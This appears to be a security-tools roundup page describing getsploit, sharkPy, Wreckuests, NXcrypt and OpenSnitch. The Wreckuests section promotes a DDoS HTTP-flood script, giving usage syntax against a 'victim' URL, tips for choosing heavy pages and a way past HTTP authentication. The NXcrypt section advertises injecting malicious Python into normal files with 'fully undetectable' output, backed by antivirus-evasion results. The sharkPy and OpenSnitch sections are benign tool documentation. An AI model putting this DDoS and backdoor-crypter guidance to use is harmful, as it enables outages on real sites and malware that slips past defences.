getsploit - Command line utility for searching and downloading exploits

Command line search and download tool for Vulners Database inspired by searchsploit. It allows you to search online for the exploits across all the most popular collections: Exploit-DB, Metasploit, Packetstorm and others. The most powerful feature is immediate exploit source download right in your working path.

Python version
Utility was tested on a python2.6, python2.7, python3.6. If you found any bugs, don't hesitate to open issue

How to use

Search

# git clone https://github.com/vulnersCom/getsploit
# cd getsploit
# ./getsploit.py wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

Save exploit files

# ./getsploit.py -m wordpress 4.7.0
Total found exploits: 8
Web-search URL: https://vulners.com/search?query=bulletinFamily%3Aexploit%20AND%20wordpress%204.7.0
+----------------------+--------------------------------+----------------------------------------------------+
|          ID          |         Exploit Title          |                        URL                         |
+======================+================================+====================================================+
|  PACKETSTORM:141039  | WordPress 4.7.0 / 4.7.1 Insert | https://vulners.com/packetstorm/PACKETSTORM:141039 |
|                      | PHP Code Injection             |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41308     | WordPress 4.7.0/4.7.1 Plugin   |     https://vulners.com/exploitdb/EDB-ID:41308     |
|                      | Insert PHP - PHP Code          |                                                    |
|                      | Injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41223     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41223     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection (PoC)                |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140893  | WordPress 4.7.0 / 4.7.1 REST   | https://vulners.com/packetstorm/PACKETSTORM:140893 |
|                      | API Privilege Escalation       |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140902  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140902 |
|                      | Content Injection / Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|  PACKETSTORM:140901  | WordPress 4.7.0 / 4.7.1        | https://vulners.com/packetstorm/PACKETSTORM:140901 |
|                      | Content Injection Proof Of     |                                                    |
|                      | Concept                        |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|     EDB-ID:41224     | WordPress 4.7.0/4.7.1 -        |     https://vulners.com/exploitdb/EDB-ID:41224     |
|                      | Unauthenticated Content        |                                                    |
|                      | Injection Arbitrary Code       |                                                    |
|                      | Execution                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+
|      SSV-92637       | WordPress REST API content     |        https://vulners.com/seebug/SSV-92637        |
|                      | injection                      |                                                    |
+----------------------+--------------------------------+----------------------------------------------------+

# ls
LICENSE         README.md       getsploit.py    wordpress-470
# cd wordpress-470
# ls
edb-id41223.txt         edb-id41224.txt         edb-id41308.txt         packetstorm140893.txt   packetstorm140901.txt   packetstorm140902.txt   packetstorm141039.txt   ssv-92637.txt

Local database
If your Python supports sqlite3 lib(builtin) you can use --update and --local commands to download whole exploit database to your PC. After update you can perform local offline searches.

# ./getsploit.py --update
Downloading getsploit database archive. Please wait, it may take time. Usually around 5-10 minutes.
219642496/219642496 [100.00%]
Unpacking database.
Database download complete. Now you may search exploits using --local key './getsploit.py -l wordpress 4.7'

Download getsploit

Read More

sharkPy - NSA Tool to Dissect, Analyze, and Interact with Network Packet Data using Wireshark and libpcap capabilities

A python module to dissect, analyze, and interact with network packet data as native Python objects using Wireshark and libpcap capabilities. sharkPy dissect modules extend and otherwise modify Wireshark's tshark. SharkPy packet injection and pcap file writing modules wrap useful libpcap functionality.

SharkPy comes with six modules that allows one to explore, create, and/or modify packet data and (re)send data over network, and write (possibly modified) packets to a new pcap output file. This is all done within python program or interactive python session.

1. sharkPy.file_dissector -- dissect capture file packets using Wireshark's dissection libraries and present detailed packet dissections to caller as native Python objects.
   
2. sharkPy.wire_dissector -- capture packets from interface and dissect captured packets using Wireshark's dissection libraries. Presents packets to callers as native Python objects.
   
3. sharkPy.file_writer -- write (possibly modified) packets to a new output pcap file. For example, one can dissect packet capture file using sharkPy.file_dissector, create new packets based on the packets in the dissected file, and then write new/modified packets to an output pcap file.
   
4. sharkPy.wire_writer -- write arbitrary data (e.g. modified packets) to specified network interface using libpcap functionality. Currently, sharkPy users are responsible for correctly building packets that are transmitted using this module's functionality.
   
5. sharkPy.utils -- a set of utility functions
   
6. sharkPy.protocol_blender -- protocol specific convenience functions. Currently contains functions for ipv4 and tcp over ipv4.
   

SharkPy is provided "as-is" with NO WARRANTIES expressed or implied under GPLv2. Use at your own risk.

Design Goals

1. Deliver dissected packet data to callers as native python objects.
   
2. Provide functionality within a Python environment, either a python program or interactive python session.
   
3. Make commands non-blocking whenever reasonable providing command results to caller on-demand.
   
4. Be easy to understand and use assuming one understands Wireshark and python basics.
   
5. Pack functionality into a small number of commands.
   
6. Build and install as little C-code as possible by linking to preexisting Wireshark shared libs.
   

Why sharkPy?
SharkPy has a long-term goal of segmenting Wireshark's incredible diversity of capabilities into a set of shared libraries that are smaller, more modular, more easily compiled and linked into other projects. This goal seperates sharkPy from other similar efforts that endeavor to marry Wireshark/tshark and Python.
The first step is provide Wireshark/tshark capabilities as Python modules that can be compiled/linked outside of Wireshark's normal build process. This has been achieved at least for some linux environments/distros. Next step is to expand to a broader range of linux distros and Windows improving stability along the way. Once this is completed and sharkPy's capabilities are similar to those provided by tshark, the sharkPy project devs will start the process of segmenting the code base as described above.

HOW-TO

VM INSTALL

Should install/run on most linux distros as long as Wireshark version 2.0.1 or newer is installed and the following steps (or equivalent) are successful.

## ubuntu-16.04-desktop-amd64 -- clean install
sudo apt-get git
git clone https://github.com/NationalSecurityAgency/sharkPy
sudo apt-get install libpcap-dev
sudo apt-get install libglib2.0-dev
sudo apt-get install libpython-dev
sudo apt-get install wireshark-dev       #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
sudo apt-get install wireshark           #if you didn't build/install wireshark (be sure wireshark libs are in LD_LIBRARY_PATH)
cd sharkPy
sudo ./setup install

DOCKER

Set up
First, make sharkPy directory and place Dockerfile into it. cd into this new directory.<br/>

Build sharkPy Docker image

docker build -t "ubuntu16_04:sharkPy" .

Notes:

• build will take a while and should be completely automated.
• sharkPy dist code will be in /sharkPy
• build creates Ubuntu 16.04 image and installs sharkPy as a Python module

Run interactively as Docker container.
Should give you command prompt

docker run -it ubuntu16_04:sharkPy /bin/bash

Command prompt and access to host NICs (to allow for network capture)

docker run -it --net=host ubuntu16_04:sharkPy /bin/bash

sharkPy API

Dissecting packets from file

dissect_file(file_path, options=[], timeout=10): collect packets from packet capture file delivering packet dissections when requested using get_next_from_file function.

• name of packet capture file.
• collection and dissection options. Options are disopt.DECODE_AS and disopt.NAME_RESOLUTION.
• timeout: amount of time (in seconds) to wait before file open fails.
• RETURNS tuple (p, exit_event, shared_pipe):
  • p: dissection process handle.
  • exit_event: event handler used to signal that collection should stop.
  • shared_pipe: shared pipe that dissector returns dissection trees into.
  • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_file and close_file functions as input param.

get_next_from_file(dissect_process,timeout=None): get next available packet dissection.

• dissect_process: tuple returned from the dissect_file function.
• timeout: amount to time to wait (in seconds) before operation timesout.
• RETURNS root node of packet dissection tree.

close_file(dissect_process): stop and clean up.

• dissect_process: tuple returned from the dissect_file function.
• RETURNS None.
• NOTE: close_file MUST be called on each session.

Dissecting packets from wire

dissect_wire(interface, options=[], timeout=None): collect packets from interface delivering packet dissections when requested using get_next function.

• name of interface to capture from.
• collection and dissection options. Options are disopt.DECODE_AS, disopt.NAME_RESOLUTION, and disopt.NOT_PROMISCUOUS.
• timeout: amount of time (in seconds) to wait before start capture fails.
• RETURNS tuple (p, exit_event, shared_queue).
  • p: dissection process handle.
  • exit_event: event handler used to signal that collection should stop.
  • shared_queue: shared queue that dissector returns dissection trees into.
  • NOTE: users should not directly interact with these return objects. Instead returned tuple is passed into get_next_from_wire and close_wire functions as input param.

get_next_from_wire(dissect_process,timeout=None): get next available packet dissection from live capture.

• dissect_process: tuple returned from the dissect_wire function.
• timeout: amount to time to wait (in seconds) before operation timesout.
• RETURNS root node of packet dissection tree.

close_wire(dissect_process): stop and clean up from live capture.

• dissect_process: tuple returned from the dissect_wire function.
• RETURNS None.
• NOTE: close_wire MUST be called on each capture session.

Writing data/packets on wire or to file

wire_writer(write_interface_list): wire_writer constructor. Used to write arbitrary data to interfaces.

• write_interface_list: list of interface names to write to.
• RETURNS: wire_writer object.
  • wire_writer.cmd: pass a command to writer.
    • wr.cmd(command=wr.WRITE_BYTES, command_data=data_to_write, command_timeout=2)
    • wr.cmd(command=wr.SHUT_DOWN_ALL, command_data=None, command_data=2)
    • wr.cmd(command=wr.SHUT_DOWN_NAMED, command_data=interface_name, command_data=2)
  • wire_writer.get_rst(timeout=1): RETURNS tuple (success/failure, number_of_bytes_written)

file_writer(): Creates a new file_writer object to write packets to an output pcap file.

• make_pcap_error_buffer(): Creates a correctly sized and initialized error buffer.
  • Returns error buffer.
• pcap_write_file(output_file_path, error_buffer): create and open new pcap output file.
  • output_file_path: path for newly created file.
  • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any errors messages will be written to this buffer.
  • RETURNS: ctypes.c_void_p, which is a context object required for other write related functions.
• pcap_write_packet(context, upper_time_val, lower_time_val, num_bytes_to_write, data_to_write, error_buffer): writes packets to opened pcap output file.
  • context: object returned by pcap_write_file().
  • upper_time_val: packet epoch time in seconds. Can be first value in tuple returned from utility function get_pkt_times().
  • lower_time_val: packet epoch time nano seconds remainder. Can be second value in tuple returned from utility function get_pkt_times().
  • num_bytes_to_write: number of bytes to write to file, size of data buffer.
  • data_to_write: buffer of data to write.
  • err_buffer: error buffer object returned by make_pcap_error_buffer(). Any errors messages will be written to this buffer.
  • RETURNS 0 on success, -1 on failure. Error message will be available in err_buffer.
• pcap_close(context): MUST be called to flush write buffer, close write file, and free allocated resources.
  • context: object returned by pcap_write_file().
  • RETURNS: None.

Utility functions

do_funct_walk(root_node, funct, aux=None): recursively pass each node in dissection tree (and aux) to function. Depth first walk.

• root_node: node in dissection tree that will be the first to be passed to function.
• funct: function to call.
• aux: optional auxilliary variable that will be passed in as parameter as part of each function call.
• RETURNS None.

get_node_by_name(root_node, name): finds and returns a list of dissection nodes in dissection tree with a given name (i.e. 'abbrev').

• root_node: root of dissection tree being passed into function.
• name: Name of node used as match key. Matches again 'abbrev' attribute.
• RETURNS: a list of nodes in dissection tree with 'abbrev' attribute that matches name.
• NOTE: 'abbrev' attribute is not necessarily unique in a given dissection tree. This is the reason that this function returns a LIST of matching nodes.

get_node_data_details(node): Returns a tuple of values that describe the data in a given dissection node.

• node: node that will have its details provided.
• RETURNS: tuple (data_len,first_byte_index, last_byte_index, data, binary_data).
  • data_len: number of bytes in node's data.
  • first_byte_index: byte offset from start of packet where this node's data starts.
  • last_byte_index: byte offset from start of packet where this node's data ends.
  • data: string representation of node data.
  • binary_data: binary representation of node data.

get_pkt_times(pkt=input_packet): Returns tuple containing packet timestamp information.

• pkt: packet dissection tree returned from one of sharkPy's dissection routines.
• RETURNS: The tuple (epoch_time_seconds, epoch_time_nanosecond_remainder). These two values are required for file_writer instances.

find_replace_data(pkt, field_name, test_val, replace_with=None, condition_funct=condition_data_equals, enforce_bounds=True, quiet=True): A general search, match, and replace data in packets.

• pkt: packet dissection tree returned from one of sharkPy's dissection routines.
• field_name: the 'abbrev' field name that will have its data modified/replaced.
• test_val: data_val/buffer that will be used for comparison in matching function.
• replace_with: data that will replace the data in matching dissection fields.
• condition_funct: A function that returns True or False and has the prototype condition_funct(node_val, test_val, pkt_dissection_tree). Default is the condition_data_equals() function that returns True if node_val == test_val. This is a literal byte for byte matching.
• enforce_bounds: If set to True, enforces condition that len(replace_with) == len(node_data_to_be_replaced). Good idea to keep this set to its default, which is True.
• quiet: If set to False, will print error message to stdout if the target field 'abbrev' name cannot be found in packet dissection tree.
• RETURNS: new packet data represented as a hex string or None if target field is not in packet.

condition_data_equals(node_val, test_val, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().

• node_val: value from the dissected packet that is being checked
• test_val: value that node_val will be compared to.
• pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
• RETURNS True if a byte for byte comparison reveals that node_val == test_val. Otherwise, returns False.

condition_always_true(node_val=None, test_val=None, pkt_dissection_tree=None): A matching function that can be passed to find_replace_data().

• node_val: Not used in this comparison
• test_val: Not used in this comparison
• pkt_dissection_tree: entire packet dissection tree. Not used in this comparison.
• RETURNS True ALWAYS. Useful of the only matching criteria is that the target field exists in packet dissection.

Protocol Blender

ipv4_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcaddr=None, new_dstaddr=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select ipv4 fields.

• pkt_dissection: packet dissection tree.
• src_match_value: current source ip address to look for (in hex). This value will be replaced.
• dst_match_value: current destination ip address to look for (in hex). This value will be replaced.
• new_srcaddr: replace current source ip address with this ip address (in hex).
• new_dstaddr: replace current destination ip address with this ip address (in hex).
• update_checksum: fixup ipv4 checksum if True (default).
• condition_funct: matching function used to find correct packets to modify.

tcp_find_replace(pkt_dissection, src_match_value=None, dst_match_value=None, new_srcport=None, new_dstport=None, update_checksum=True, condition_funct=sharkPy.condition_data_equals): Modifies select fields for tcp over ipv4.

• pkt_dissection: packet dissection tree.
• src_match_value: current source tcp port to look for (in hex). This value will be replaced.
• dst_match_value: current destination tcp port to look for (in hex). This value will be replaced.
• new_srcaddr: replace current source tcp port with this tcp port (in hex).
• new_dstaddr: replace current destination tcp port with this tcp port (in hex).
• update_checksum: fixup tcp checksum if True (default).
• condition_funct: matching function used to find correct packets to modify.

Dissect packets in a capture file

>>> import sharkPy

Supported options so far are DECODE_AS and NAME_RESOLUTION (use option to disable)

>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http')]

Start file read and dissection.

>>> dissection = sharkPy.dissect_file(r'/home/me/capfile.pcap', options=in_options)

Use sharkPy.get_next_from_file to get packet dissections of read packets.

>>> rtn_pkt_dissections_list = []
>>> for cnt in xrange(13):
...     pkt = sharkPy.get_next_from_file(dissection)
...     rtn_pkt_dissections_list.append(pkt)

Node Attributes: 
 abbrev:     frame.
 name:       Frame.
 blurb:      None.
 fvalue:     None.
 level:      0.
 offset:     0.
 ftype:      1.
 ftype_desc: FT_PROTOCOL.
 repr:       Frame 253: 54 bytes on wire (432 bits), 54 bytes captured (432 bits) on interface 0.
 data:       005056edfe68000c29....<rest edited out>

Number of child nodes: 17
 frame.interface_id
 frame.encap_type
 frame.time
 frame.offset_shift
 frame.time_epoch
 frame.time_delta
 frame.time_delta_displayed
 frame.time_relative
 frame.number
 frame.len
 frame.cap_len
 frame.marked
 frame.ignored
 frame.protocols
 eth
 ip
 tcp

  Node Attributes: 
   abbrev:     frame.interface_id.
   name:       Interface id.
   blurb:      None.
   fvalue:     0.
   level:      1.
   offset:     0.
   ftype:      6.
   ftype_desc: FT_UINT32.
   repr:       Interface id: 0 (eno16777736).
   data:       None.

  Number of child nodes: 0

...<remaining edited out>

Must always close sessions

>>> sharkPy.close_file(dissection)

Take a packet dissection tree and index all nodes by their names (abbrev field)

>>> pkt_dict = {}
>>> sharkPy.collect_proto_ids(rtn_pkt_dissections_list[0], pkt_dict)

Here are all the keys used to index this packet dissection

>>> print pkt_dict.keys()
['tcp.checksum_bad', 'eth.src_resolved', 'tcp.flags.ns', 'ip', 'frame', 'tcp.ack', 'tcp', 'frame.encap_type', 'eth.ig', 'frame.time_relative', 'ip.ttl', 'tcp.checksum_good', 'tcp.stream', 'ip.version', 'tcp.seq', 'ip.dst_host', 'ip.flags.df', 'ip.flags', 'ip.dsfield', 'ip.src_host', 'tcp.len', 'ip.checksum_good', 'tcp.flags.res', 'ip.id', 'ip.flags.mf', 'ip.src', 'ip.checksum', 'eth.src', 'text', 'frame.cap_len', 'ip.hdr_len', 'tcp.flags.cwr', 'tcp.flags', 'tcp.dstport', 'ip.host', 'frame.ignored', 'tcp.window_size', 'eth.dst_resolved', 'tcp.flags.ack', 'frame.time_delta', 'tcp.flags.urg', 'ip.dsfield.ecn', 'eth.addr_resolved', 'eth.lg', 'frame.time_delta_displayed', 'frame.time', 'tcp.flags.str', 'ip.flags.rb', 'tcp.flags.fin', 'ip.dst', 'tcp.flags.reset', 'tcp.flags.ecn', 'tcp.port', 'eth.type', 'ip.checksum_bad', 'tcp.window_size_value', 'ip.addr', 'ip.len', 'frame.time_epoch', 'tcp.hdr_len', 'frame.number', 'ip.dsfield.dscp', 'frame.marked', 'eth.dst', 'tcp.flags.push', 'tcp.srcport', 'tcp.checksum', 'tcp.urgent_pointer', 'eth.addr', 'frame.offset_shift', 'tcp.window_size_scalefactor', 'ip.frag_offset', 'tcp.flags.syn', 'frame.len', 'eth', 'ip.proto', 'frame.protocols', 'frame.interface_id']

Note that pkt_dict entries are lists given that 'abbrevs' are not always unique within a packet.

>>> val_list = pkt_dict['tcp']

Turns out that 'tcp' list has only one element as shown below.

>>> for each in val_list:
...     print each
... 
Node Attributes: 
 abbrev:     tcp.
 name:       Transmission Control Protocol.
 blurb:      None.
 fvalue:     None.
 level:      0.
 offset:     34.
 ftype:      1.
 ftype_desc: FT_PROTOCOL.
 repr:       Transmission Control Protocol, Src Port: 52630 (52630), Dst Port: 80 (80), Seq: 1, Ack: 1, Len: 0.
 data:       cd960050df6129ca0d993e7750107d789f870000.

Number of child nodes: 15
 tcp.srcport
 tcp.dstport
 tcp.port
 tcp.port
 tcp.stream
 tcp.len
 tcp.seq
 tcp.ack
 tcp.hdr_len
 tcp.flags
 tcp.window_size_value
 tcp.window_size
 tcp.window_size_scalefactor
 tcp.checksum
 tcp.urgent_pointer

Shortcut for finding a node by name:

>>> val_list = sharkPy.get_node_by_name(rtn_pkt_dissections_list[0], 'ip')

Each node in a packet dissection tree has attributes and a child node list.

>>> pkt = val_list[0]

This is how one accesses attributes

>>> print pkt.attributes.abbrev
tcp

>>> print pkt.attributes.name
Transmission Control Protocol

Here's the pkt's child list

>>> print pkt.children
[<sharkPy.dissect.file_dissector.node object at 0x10fda90>, <sharkPy.dissect.file_dissector.node object at 0x10fdb10>, <sharkPy.dissect.file_dissector.node object at 0x10fdbd0>, <sharkPy.dissect.file_dissector.node object at 0x10fdc90>, <sharkPy.dissect.file_dissector.node object at 0x10fdd50>, <sharkPy.dissect.file_dissector.node object at 0x10fddd0>, <sharkPy.dissect.file_dissector.node object at 0x10fde50>, <sharkPy.dissect.file_dissector.node object at 0x10fded0>, <sharkPy.dissect.file_dissector.node object at 0x10fdf90>, <sharkPy.dissect.file_dissector.node object at 0x1101090>, <sharkPy.dissect.file_dissector.node object at 0x11016d0>, <sharkPy.dissect.file_dissector.node object at 0x11017d0>, <sharkPy.dissect.file_dissector.node object at 0x1101890>, <sharkPy.dissect.file_dissector.node object at 0x1101990>, <sharkPy.dissect.file_dissector.node object at 0x1101b50>]

Get useful information about a dissection node's data

>>> data_len, first_byte_offset, last_byte_offset, data_string_rep, data_binary_rep=sharkPy.get_node_data_details(pkt)

>>> print data_len
54

>>> print first_byte_offset
0

>>> print last_byte_offset
53

>>> print data_string_rep
005056edfe68000c29....<rest edited out>

>>> print binary_string_rep
<prints binary spleg, edited out>

CAPTURE PACKETS FROM NETWORK AND DISSECT THEM

SharkPy wire_dissector provides additional NOT_PROMISCUOUS option

>>> in_options=[(sharkPy.disopt.DECODE_AS, r'tcp.port==8888-8890,http'), (sharkPy.disopt.DECODE_AS, r'tcp.port==9999:3,http'), (sharkPy.disopt.NOT_PROMISCUOUS, None)]

Start capture and dissection. Note that caller must have appropriate permissions. Running as root could be dangerous!

>>> dissection = sharkPy.dissect_wire(r'eno16777736', options=in_options)
>>> Running as user "root" and group "root". This could be dangerous.

Use sharkPy.get_next_from_wire to get packet dissections of captured packets.

>>> for cnt in xrange(13):
...     pkt=sharkPy.get_next_from_wire(dissection)
...     sharkPy.walk_print(pkt) ## much better idea to save pkts in a list

Must always close capture sessions

>>> sharkPy.close_wire(dissection)

WRITE DATA (packets) TO NETWORK

Create writer object using interface name

>>> wr = sharkPy.wire_writer(['eno16777736'])

Send command to write data to network with timeout of 2 seconds

>>> wr.cmd(wr.WRITE_BYTES,'  djwejkweuraiuhqwerqiorh', 2)

Check for failure. If successful, get return values.

>>> if(not wr.command_failure.is_set()):
...     print wr.get_rst(1)
... 
(0, 26) ### returned success and wrote 26 bytes. ###

WRITE PACKETS TO OUTPUT PCAP FILE

Create file writer object

>>> fw = file_writer()

Create error buffer

>>> errbuf = fw.make_pcap_error_buffer()

Open/create new output pcap file into which packets will be written

>>> outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)

Dissect packets in an existing packet capture file.

>>> sorted_rtn_list = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

Write first packet into output pcap file.

Get first packet dissection

>>> pkt_dissection=sorted_rtn_list[0]

Acquire packet information required for write operation

>>> pkt_frame = sharkPy.get_node_by_name(pkt_dissection, 'frame')
>>> frame_data_length, first_frame_byte_index, last_frame_byte_index, frame_data_as_string, frame_data_as_binary = sharkPy.get_node_data_details(pkt_frame[0])
>>> utime, ltime = sharkPy.get_pkt_times(pkt_dissection)

Write packet into output file

>>> fw.pcap_write_packet(outfile, utime, ltime, frame_data_length, frame_data_as_binary, errbuf)

Close output file and clean-up

>>> fw.pcap_close(outfile)

Match and replace before writing new packets to output pcap file

import sharkPy, binascii

test_value1 = r'0xc0a84f01'
test_value2 = r'c0a84fff'
test_value3 = r'005056c00008'

fw = sharkPy.file_writer()
errbuf = fw.make_pcap_error_buffer()
outfile = fw.pcap_write_file(r'/home/me/test_output_file.pcap', errbuf)
sorted_rtn_list = sharkPy.dissect_file(r'/home/me/tst.pcap', timeout=20)

for pkt in sorted_rtn_list:

    # do replacement
    new_str_data = sharkPy.find_replace_data(pkt, r'ip.src', test_value1, r'01010101')
    new_str_data = sharkPy.find_replace_data(pkt, r'ip.dst', test_value2, r'02020202')
    new_str_data = sharkPy.find_replace_data(pkt, r'eth.src', test_value3, r'005050505050')

    # get detains required to write to output pcap file
    pkt_frame = sharkPy.get_node_by_name(pkt, 'frame')
    fdl, ffb, flb, fd, fbd = sharkPy.get_node_data_details(pkt_frame[0])
    utime, ltime = sharkPy.get_pkt_times(pkt)

    if(new_str_data is None):
        new_str_data = fd

    newbd = binascii.a2b_hex(new_str_data)
    fw.pcap_write_packet(outfile, utime, ltime, fdl, newbd, errbuf)

fw.pcap_close(outfile)

Download sharkPy

Read More

Wreckuests - Tool to run DDoS atacks with HTTP-flood

Wreckuests is a script, which allows you to run DDoS attacks with HTTP-flood(GET/POST). It's written in pure Python and uses proxy-servers as "bots". OF COURSE, this script is not universal and you can't just drop Pentagon/NSA/whatever website with one mouse click. Each attack is unique, and for each website you'll gonna need to search for vulnerabilities and exult them, which might result in hardcoding, nosleeping, etc... Yeap, this is your dirty and ungrateful part of job.

⚠️ Warning: This script is published for educational purposes only! Author will accept no responsibility for any consequence, damage or loss which might result from use.

Features

• Cache bypass with random ?abcd=efg parameter
• CloudFlare detection and notification of
• Automatic gzip/deflate toggling
• HTTP Authentication bypass
• UserAgent substitution
• Referers randomizer
• HTTP proxy support

Dependencies

• Python 3.5+
• Requests 2.10.0 or higher
• netaddr (tested with 0.7.19)

Installation

This is so easy to install Wreckuests just in one command. Isn't it?

Ubuntu 16.04

apt-get update && apt-get dist-upgrade && apt-get install python3 && apt-get install python3-pip && pip3 install --upgrade pip && pip3 install requests && pip3 install netaddr

Note: pip3 may install requests 2.9.1. Just run pip3 install --upgrade requests to upgrade requests to the latest version.

Usage
Type under sudo mode:

python3 wreckuests.py -v <target url> -a <login:pass> -t <timeout>

Possible parameters:
-h or --help:
Prints a message with possible parameters.
-v or --victim:
Specifies a link to the victim's site page. It could be the website's main page, someone's profile, .php-file or even image. Everything that has a lot of weight or is hard for server to give. The choice is yours.
-a or --auth:
Parameter for bypassing authentication. You'r victim could enable basic HTTP authentication and his website will ask you to enter login and password in popup window. Victim may previously publish login and password data for his users in VK/FB/Twitter and whatever social network.
-t or --timeout(defalut: 10):
Parameter to control connection'n'read timeout. This option also controls terminating time. Note: if you set timeout=1 or somewhere about 2-3 seconds, the slow(but still working) proxies will not have any time to even connect to your victim's website and will not even hit it. If you still do not understand how it works - do not change this option. Also, this parameter regulates the intensiveness of requests you sending. So, if you sure your proxies are fast enough - you can reduce this value. Use this accordingly.

Important
A separate thread is created for each proxy address. The more proxies you use - the more threads you create. So, please, do not use way too much proxies. Otherwise, the script may exit abnormaly by meeting segmentation fault.

Download wreckuests

Read More

NXcrypt - Python Backdoor Framework

NXcrypt

• NXcrypt is a polymorphic 'python backdoors' crypter written in python by Hadi Mene (h4d3s) . The output is fully undetectable .
  
• NXcrypt can inject malicious python file into a normal file with multi-threading system .
  
• Run it with superuser's permissions .
  
• NXcrypt output is Fully undetectable .

Usage :

• sudo ./NXcrypt.py --file=backdoor.py --output=output_backdoor.py # encrypt backdoor.py and output file is output_backdoor.py
• sudo ./NXcrypt.py --file=shell.py # encrypt shell.py and default output file is backdoor.py but you can edit it in source code
• sudo ./NXcrypt.py --help # NXcrypt help
• sudo ./NXcrypt.py --backdoor-file=payload.py --file=test.py --output=hacked.py # inject payload.py with test.py into hacked.py with multi-threading system

How it work ?

• Encryption module :

• NXcrypt add some junkcode .
• NXcrypt use a python internal module 'py_compile' who compile the code into bytecode to a .pyc file .
• NXcrypt convert .pyc file into normal .py file .
• And in this way we can obfuscate the code
• The md5sum will change too

• Injection module :

• it inject a malicious python file into a normal file with multi-threading system .

Test with Virustotal
Before :
SHA256: e2acceb6158cf406669ab828d338982411a0e5c5876c2f2783e247b3e01c2163 File name: facebook.py Detection ratio: 2 / 54
After :
SHA256: 362a4b19d53d1a8f2b91491b47dba28923dfec2d90784961c46213bdadc80add File name: facebook_encrypted.py Detection ratio: 0 / 55

Video Tutorial
https://www.youtube.com/watch?v=s8Krngv2z9Q

Download NXcrypt

Read More

OpenSnitch - GNU/Linux port of the Little Snitch application firewall

OpenSnitch is a GNU/Linux port of the Little Snitch application firewall.

Requirements
You'll need a GNU/Linux distribution with iptables, NFQUEUE and ftrace kernel support.

Install

sudo apt-get install build-essential python3-dev python3-setuptools libnetfilter-queue-dev python3-pyqt5 python3-gi python3-dbus python3-pyinotify
cd opensnitch
sudo python3 setup.py install

Run

sudo -HE opensnitchd
opensnitch-qt

Known Issues / Future Improvements
Before opening an issue, keep in mind that the current implementation is just an experiment to see the doability of the project, future improvements of OpenSnitch will include:
Split the project into opensnitchd, opensnitch-ui and opensnitch-ruleman:

• opensnitchd will be a (C++ ? TBD) daemon, running as root with the main logic. It'll fix this.
• opensnitch-ui python (?) UI running as normal user, getting the daemon messages. Will fix this.
• opensnitch-ruleman python (?) UI for rule editing.

How Does It Work
OpenSnitch is an application level firewall, meaning then while running, it will detect and alert the user for every outgoing connection applications he's running are creating. This can be extremely effective to detect and block unwanted connections on your system that might be caused by a security breach, causing data exfiltration to be much harder for an attacker. In order to do that, OpenSnitch relies on NFQUEUE, an iptables target/extension which allows an userland software to intercept IP packets and either ALLOW or DROP them, once started it'll install the following iptables rules:

OUTPUT -t mangle -m conntrack --ctstate NEW -j NFQUEUE --queue-num 0 --queue-bypass

This will use conntrack iptables extension to pass all newly created connection packets to NFQUEUE number 0 (the one OpenSnitch is listening on), and then:

INPUT --protocol udp --sport 53 -j NFQUEUE --queue-num 0 --queue-bypass

